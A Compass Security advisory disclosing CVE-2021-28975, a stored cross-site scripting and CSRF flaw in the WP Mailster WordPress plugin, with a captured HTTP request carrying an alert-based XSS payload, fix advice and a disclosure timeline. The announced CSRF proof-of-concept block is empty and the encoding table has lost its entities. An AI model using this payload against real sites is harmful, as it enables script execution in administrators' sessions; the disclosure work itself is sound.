#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: WP Mailster [1]
# Vendor: WP Mailster
# CSNC ID: CSNC-2021-018
# CVE ID: CVE-2021-28975
# Subject: Cross-Site Scripting (XSS) [2]
and Cross-Site Request Forgery (CSRF) [3]
# Risk: High
# Effect: Remotely exploitable
# Author: Emanuele Barbeno (advisories@compass-security.com)
# Date: 21.10.2021
#
#############################################################
Introduction:
-------------
Mailster is a mailing list plugin for WordPress. It enables you to offer
automated electronic mailing lists. [4]
Compass Security discovered a security flaw in WP Mailster plugin, which
allows injecting client-side code into the WordPress admin panel. Furthermore,
because the plugin fails to validate anti-CSRF tokens, the client-side code
injection can be exploited remotely if an admin user with a valid session
visits a malicious website on the Internet.
Affected:
---------
Vulnerable:
* 1.6.18.0
Not Vulnerable:
* 1.6.19.0
No other version was tested, but it is believed for the older versions to be
vulnerable as well.
Technical Description
---------------------
The user's input data is not properly encoded when being echoed back to the
user. Therefore, this data can be interpreted as executable code by the
browser and allows an attacker to execute JavaScript code in the WordPress
admin console in the context of the victim's browser if the victim opens a
mail server's details in the mst_servers page whose the "server_host", the
"server_name" or the "connection_parameter" parameters' values contain the
XSS payload.
The following HTTP request shows the injected XSS payload in the server_host
input parameter:
```
POST /wordpress/wp-admin/admin.php?page=mst_servers&subpage=edit&sid=2 HTTP/1.1
Host: mydomain.local
Content-Length: 226
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://mydomain.local
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/81.0.4028.0 Safari/537.36 autochrome/red
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=
0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://mydomain.local/wordpress/wpadmin/admin.php?page=mst_servers&subpage=edit&sid=1&_wpnonce=845ead6aa9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie:
wordpress_66e96405e885fd924bb37c24f3319402=admin%7C1615735484%7CbDVt0g2WUVCRVbuty8
iHI7pYlC0KbouXa6BDhdoTuka%7Cb3c7728f6c07e8049c6e0e8a37a8035e698ed9ac6006993f93b8b4
eaf8a4667e; wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_66e96405e885fd924bb37c24f3319402=admin%7C1615735484%7CbDVt0g2W
UVCRVbuty8iHI7pYlC0KbouXa6BDhdoTuka%7C114a4995e06b2a7d23d13d2b289559678f13bac0233b
f9184ce4a033041254a4; wp-settings-time-1=1615562785;
PHPSESSID=3ppf9hugcjhni5gnosc0u4nfeb
Connection: close
sid=2&server_type=0&server_name=&server_host=csnc"onfocus=alert(1);//"+autofocus=&
server_port=&secure_protocol=&secure_authentication=0&protocol=pop3&connection_par
ameter=&add_server=edit&sid=2&server_action=Update+Mail+Server
```
The HTTP response shows that the XSS payload is not encoded by the web application,
thus the payload is evaluated and executed as JavaScript code by the browser:
```
HTTP/1.1 200 OK
Date: Fri, 12 Mar 2021 15:36:19 GMT
Server: Apache/2.4.46 (Debian)
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Set-Cookie: wp-settings-1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; MaxAge=0;
path=/wordpress/
Set-Cookie: wp-settings-time-1=1615563379; expires=Sat, 12-Mar-2022 15:36:19 GMT;
Max-Age=31536000; path=/wordpress/
Vary: Accept-Encoding
Content-Length: 35286
Connection: close
Content-Type: text/html; charset=UTF-8
[CUT BY COMPASS]
[CUT BY COMPASS]
```
Furthermore, the tested version fails to validate anti-CSRF tokens, thus this vulnerability
can be exploited by an external attacker hosting the following HTML PoC code on a malicious
website on the Internet. When the victim, who has a valid admin session on the Wordpress dashboard,
accesses the website hosting the following PoC code, the request shown before will be sent to the
backend and the XSS payload will be evaluated in the victim's browser:
```
```
Workaround / Fix:
-----------------
Dangerous characters should be encoded on output according to the encoding
rules of the respective type of context. The whole code should be analyzed for
it and updated accordingly. For regular HTML body content, use HTML encoding [5]:
* < -> <
* > -> >
* " -> "
* ' -> '
* & -> &
Furthermore, the application should include a random token, which changes for each
user session. If a request is received by the server, which does not include
the correct token, it should be rejected by the server. [6]
Timeline:
---------
2021-03-12: Discovery by Emanuele Barbeno
2021-03-12: Initial vendor notification
2021-03-17: Initial vendor response
2021-04-20: Assigned CVE-2021-28975
2021-10-21: Public disclosure
References:
-----------
[1] https://wpmailster.com/
[2] https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS)
[3] https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
[4] https://wpmailster.com/doc/introduction/
[5] https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
[6] https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html